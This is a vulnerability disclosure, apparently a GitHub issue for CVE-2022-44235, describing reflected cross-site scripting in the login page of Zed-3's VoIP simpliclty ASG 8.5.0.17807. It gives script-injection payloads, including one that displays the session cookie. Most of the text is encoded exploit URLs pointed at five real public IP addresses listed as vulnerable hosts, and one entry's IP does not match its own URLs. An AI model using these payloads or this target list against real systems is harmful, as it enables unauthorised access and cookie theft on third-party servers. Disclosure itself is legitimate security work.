Headline
CVE-2022-44235: VoIP simpliclty of Zed-3 is vulnerable to Cross Site Scripting (XSS) · Issue #1 · liong007/Zed-3
Beijing Zed-3 Technologies Co.,Ltd VoIP simpliclty ASG 8.5.0.17807 (20181130-16:12) is vulnerable to Cross Site Scripting (XSS).
**Exploit Title:**VoIP simpliclty of Zed-3 is vulnerable to Cross Site Scripting (XSS)
Company to which the vulnerability belongs: Beijing Zed-3 Technologies Co.,Ltd
**Date:**10/20/2022
**Exploit Author:**Yuan Lirong
Vendor Homepage: www.zed-3.com
ASG Version: 8.5.0.17807 (20181130-16:12)
Attack vector(s):
Beijing Zed-3 Technologies Co.,Ltd. is a high-tech enterprise founded by high-tech talents.
There is an XSS vulnerability in the VoIP simplilty developed by Beijing Zed-3 Technologies Co.,Ltd. An attacker can use this vulnerability to insert XSS execution code into the page "/login.php?pMessage=", perform pop-up operations, and obtain sensitive information such as user cookies.
POC:
</script><script>[window[“location”]="javascript:alert(/xss/)"]</script>
And
</script><script>[window[“location”]="javascript:alert(document.cookie)"]</script>
Vulnerability test cases:
You need to use an IP address in China to access.
1)https://223.86.24.188:8002
https://223.86.24.188:8002/login.php
ASG Version: 8.5.0.17807 (20181130-16:12)
XSS vulnerability testing can be performed without logging in to the system:
https://223.86.24.188:8002/login.php?pMessage=%3C/script%3E%3Cscript%3E[window[%22location%22]=%22javascript:alert(/xss/)%22]%3C/script%3E
https://223.86.24.188:8002/login.php?pMessage=%3C/script%3E%3Cscript%3E[window[%22location%22]=%22javascript:alert(document.cookie)%22]%3C/script%3E
2)https://118.122.192.197:8002/login.php
ASG Version: 8.5.0.17807 (20181130-16:12)
XSS vulnerability testing can be performed without logging in to the system:
https://118.122.192.197:8002/login.php?pMessage=%3C/script%3E%3Cscript%3E[window[%22location%22]=%22javascript:alert(/xss/)%22]%3C/script%3E
https://118.122.192.197:8002/login.php?pMessage=%3C/script%3E%3Cscript%3E[window[%22location%22]=%22javascript:alert(document.cookie)%22]%3C/script%3E
3)https://110.189.91.53:8002/login.php
ASG Version: 8.5.0.17807 (20181130-16:12)
XSS vulnerability testing can be performed without logging in to the system:
https://110.189.91.53:8002/login.php?pMessage=%3C/script%3E%3Cscript%3E[window[%22location%22]=%22javascript:alert(/xss/)%22]%3C/script%3E
https://110.189.91.53:8002/login.php?pMessage=%3C/script%3E%3Cscript%3E[window[%22location%22]=%22javascript:alert(document.cookie)%22]%3C/script%3E
4)https://112.45.129.134:8002/login.php
ASG Version: 8.5.0.17807 (20181130-16:12)
XSS vulnerability testing can be performed without logging in to the system:
https://112.45.129.134:8002/login.php?pMessage=%3C/script%3E%3Cscript%3E[window[%22location%22]=%22javascript:alert(/xss/)%22]%3C/script%3E
https://112.45.129.134:8002/login.php?pMessage=%3C/script%3E%3Cscript%3E[window[%22location%22]=%22javascript:alert(document.cookie)%22]%3C/script%3E
5)https://110.185.174.104:8002/login.php
ASG Version: 8.5.0.17807 (20181130-16:12)
XSS vulnerability testing can be performed without logging in to the system:
https://110.186.68.180:8002/login.php?pMessage=%3C/script%3E%3Cscript%3E[window[%22location%22]=%22javascript:alert(/xss/)%22]%3C/script%3E
https://110.186.68.180:8002/login.php?pMessage=%3C/script%3E%3Cscript%3E[window[%22location%22]=%22javascript:alert(document.cookie)%22]%3C/script%3E